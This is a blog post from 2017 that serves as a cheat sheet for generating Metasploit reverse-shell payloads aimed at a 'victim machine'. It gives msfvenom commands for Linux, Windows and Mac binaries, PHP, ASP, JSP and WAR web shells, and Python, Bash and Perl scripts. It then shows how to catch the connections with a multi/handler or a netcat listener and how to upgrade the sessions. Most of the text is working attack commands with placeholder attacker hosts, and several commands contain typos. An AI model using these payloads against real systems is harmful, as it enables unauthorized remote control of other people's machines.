Disqus Shortname

Sunday, 9 April 2017

Generating Metasploit Payloads : Creating Metasploit Reverse Shell



Generating Metasploit Payloads : Creating Metasploit Reverse Shell


Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

 Mention payloads require certain inputs as an option such as LHOST, LPORT.


Operating System Based Bionaries Shell


Linux

 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf shell.elf
Windows

 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe
Mac

 
msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection


PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php

Open the shell.php file in a text editor and remove the "#" will be present in starting position of this file.

 ASP

 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp

 JSP

 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerip -f raw > shell.jsp
WAR

 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war

Script Based Payloads:

Python

 
msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw > shell.py

 Bash

 
msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw > shell.sh
Perl

 
msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw > shell.pl

Shellcode

Linux Based Shellcode

 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode

 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

 Mac Based Shellcode

 
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Simple TCP Reverse Shell

Windows

 
windows/shell_reverse_tcp
windows/x86/shell_reverse_tcp







Linux




linux/shell_reverse_tcp

















Mac



osx/x64/shell_reverse_tcp



osx/x86/shell_reverse_tcp







Handling The Reverse/Bind Connection









You can handle those reverse connection using Netcat and Metasploit Multi Handler Module.







Netcat : Use this command on your attacking machine : nc nlvp <attackerport>







Metasploit : In metasploit follow below steps to handle those reverse connection










use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>


exploit (This will prompt you the reverse just after executing the shell)
exploit -j (This will background the shell immedietly after receiving the reverse shell)






Note - Some time, you will not get the meterpreter reverse shell or the shell will be die


immediately due to various reasons. In this case first you can try to simple windows shell 


(shell_reverse_tcp)






use exploit/multi/handler
set PAYLOAD <set payload windows/shell_reverse_tcp>
set LHOST <AttackerIp>
set LPORT <AttackerPort>




exploit -j 


exploit -j (This will background the shell immediately after receiving the reverse 


shell, After getting background you can interact with it by command session -i <sessionnumber>)











Now use this command to upgrade the simple reverse tcp shell into meterpreter reverse shell



sesssions -i <numberofsession> -u 
















By



































No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)